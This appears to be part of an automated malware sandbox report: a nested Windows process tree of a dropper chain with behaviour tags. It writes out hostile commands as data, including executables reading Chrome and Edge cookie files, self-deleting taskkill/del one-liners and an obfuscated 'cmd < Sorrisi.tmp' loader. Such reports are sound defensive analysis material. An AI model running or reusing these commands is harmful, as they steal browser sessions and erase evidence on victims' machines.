                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\GCs4oj_Hi2ekS5leSCbTlvAI.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\GCs4oj_Hi2ekS5leSCbTlvAI.exe
                                                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:6840
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Z4zW4fOlwHjE6tHOO22rqkZU.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\Z4zW4fOlwHjE6tHOO22rqkZU.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:6372
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7028
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\setup_install.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6388
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6560
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4208
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5412
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4332
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS47BC6346\karotima_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    karotima_1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6476
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\737Xw6eWrEhDUcKYf1KdiefD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\737Xw6eWrEhDUcKYf1KdiefD.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7180
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4980
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\737Xw6eWrEhDUcKYf1KdiefD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\737Xw6eWrEhDUcKYf1KdiefD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2912
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7252
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7664
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\zNEjdrv3N6TJCUUCU58PmLx2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8304
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\PFMkmfx7jQf3PnRsswu6O3o_.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\PFMkmfx7jQf3PnRsswu6O3o_.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4124
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im PFMkmfx7jQf3PnRsswu6O3o_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\PFMkmfx7jQf3PnRsswu6O3o_.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2268
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    taskkill /im PFMkmfx7jQf3PnRsswu6O3o_.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7880
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8472
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\4teFeqb_TJUFlAjmfvFM7kG6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\4teFeqb_TJUFlAjmfvFM7kG6.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6152
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\58CDII4CZx7lCH54C57KLXvG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\58CDII4CZx7lCH54C57KLXvG.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5752
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7864
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5836
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7148
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                              19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9084
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.002\Acre.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                Acre.exe.com k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.002\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.002\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2792
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5936
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9168
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im I4tsdsJBxwYHSFGjezspU5JO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\I4tsdsJBxwYHSFGjezspU5JO.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    taskkill /im I4tsdsJBxwYHSFGjezspU5JO.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10136
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\sS4FrZenwxYzPAetuRKwHWQT.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\sS4FrZenwxYzPAetuRKwHWQT.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7752
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\jsaS2irTnqJMgnZCrWba3tVo.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\jsaS2irTnqJMgnZCrWba3tVo.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\jsaS2irTnqJMgnZCrWba3tVo.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\jsaS2irTnqJMgnZCrWba3tVo.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8284
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\J3GgVr9ULONs_osHKBa8tAil.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\h2M3xQ0AqgMN0KNk7XzZlZBS.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\h2M3xQ0AqgMN0KNk7XzZlZBS.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7304440.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7304440.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7444219.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7444219.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\pguRoIRSYz2yPz_YwJ0ChGGd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\pguRoIRSYz2yPz_YwJ0ChGGd.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\3lxfbvQg9IV8a2OrUjeuEmMh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\3lxfbvQg9IV8a2OrUjeuEmMh.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "{path}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\5uKNBpf1aZwGBNeZGMvq9KPj.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\5uKNBpf1aZwGBNeZGMvq9KPj.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7512635.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7512635.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8236
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\s6ZSM_5y0xIRIIWCZVRjfZrP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\s6ZSM_5y0xIRIIWCZVRjfZrP.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\uALPUP_QTElVL8mL63DY4PWF.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\uALPUP_QTElVL8mL63DY4PWF.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\cVzLioHDynMY63ZKwiAH7t4O.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\cVzLioHDynMY63ZKwiAH7t4O.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\cVzLioHDynMY63ZKwiAH7t4O.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\cVzLioHDynMY63ZKwiAH7t4O.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\Z_1yEpTj_Scz5LMDiEhYxJ3k.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\Z_1yEpTj_Scz5LMDiEhYxJ3k.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\Z_1yEpTj_Scz5LMDiEhYxJ3k.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\Z_1yEpTj_Scz5LMDiEhYxJ3k.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\AOSlUCM1mSJjGUEqnrfEfz9P.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\AOSlUCM1mSJjGUEqnrfEfz9P.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\setup_install.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\setup_install.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      karotima_2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8200
